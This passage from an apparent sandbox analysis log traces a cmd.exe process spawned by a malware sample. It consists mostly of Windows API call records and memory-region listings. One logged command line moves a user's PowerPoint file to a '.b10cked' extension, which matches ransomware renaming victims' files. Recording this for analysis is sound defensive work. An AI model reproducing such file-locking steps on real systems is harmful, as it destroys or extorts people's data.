_get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] GetFileType (hFile=0x4c) returned 0x1 [0232.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.795] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] GetFileType (hFile=0x4c) returned 0x1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] GetFileType (hFile=0x4c) returned 0x1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.796] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] GetFileType (hFile=0x4c) returned 0x1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] GetFileType (hFile=0x4c) returned 0x1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] GetFileType (hFile=0x4c) returned 0x1 [0232.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.796] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] GetFileType (hFile=0x4c) returned 0x1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] GetFileType (hFile=0x4c) returned 0x1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] GetFileType (hFile=0x4c) returned 0x1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] GetFileType (hFile=0x4c) returned 0x1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] GetFileType (hFile=0x4c) returned 0x1 [0232.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.797] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.798] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] GetFileType (hFile=0x4c) returned 0x1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] GetFileType (hFile=0x4c) returned 0x1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] GetFileType (hFile=0x4c) returned 0x1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] GetFileType (hFile=0x4c) returned 0x1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] GetFileType (hFile=0x4c) returned 0x1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] GetFileType (hFile=0x4c) returned 0x1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.798] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.799] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] GetFileType (hFile=0x4c) returned 0x1 [0232.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.799] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.800] GetFileType (hFile=0x4c) returned 0x1 [0232.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.800] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.800] GetFileType (hFile=0x4c) returned 0x1 [0232.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.800] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.801] GetFileType (hFile=0x4c) returned 0x1 [0232.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.801] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.801] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.801] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.801] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.801] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.801] GetFileType (hFile=0x4c) returned 0x1 [0232.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.801] GetFileType (hFile=0x4c) returned 0x1 [0232.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.801] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.801] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.802] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.802] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x32, lpOverlapped=0x0) returned 1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.802] GetFileType (hFile=0x4c) returned 0x1 [0232.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.803] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x32, lpOverlapped=0x0) returned 1 [0232.803] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.803] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.803] _close (_FileHandle=4) returned 0 [0232.803] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x2cef7c | out: lpFindFileData=0x2cef7c) returned 0 [0232.803] GetLastError () returned 0x12 [0232.803] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0232.804] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0232.804] _close (_FileHandle=3) returned 0 [0232.804] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.804] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.805] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.805] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.805] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.805] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.805] SetConsoleInputExeNameW () returned 0x1 [0232.805] GetConsoleOutputCP () returned 0x1b5 [0232.805] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.805] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.805] exit (_Code=0) Process: id = "619" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x9d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\IYDSDI~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34465 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34466 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34467 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34468 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34469 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34470 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34471 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34472 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34473 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 34474 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34623 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34624 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34625 start_va = 0x50000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 34626 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 34627 start_va = 0x2d0000 end_va = 0x336fff entry_point = 0x2d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34628 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34629 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34630 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34631 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34632 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34633 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34634 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34635 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34636 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34719 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 34720 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34721 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34722 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34723 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 34724 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 34725 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 34726 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 34727 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 34728 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Thread: id = 859 os_tid = 0x7d0 [0231.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f974 | out: lpSystemTimeAsFileTime=0x18f974*(dwLowDateTime=0xbdc41d00, dwHighDateTime=0x1d440a9)) [0231.885] GetCurrentProcessId () returned 0x9d8 [0231.885] GetCurrentThreadId () returned 0x7d0 [0231.885] GetTickCount () returned 0x3fce4 [0231.885] QueryPerformanceCounter (in: lpPerformanceCount=0x18f96c | out: lpPerformanceCount=0x18f96c*=28867419704) returned 1 [0231.886] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.886] __set_app_type (_Type=0x1) [0231.886] __p__fmode () returned 0x76b331f4 [0231.886] __p__commode () returned 0x76b331fc [0231.886] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.886] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.886] GetCurrentThreadId () 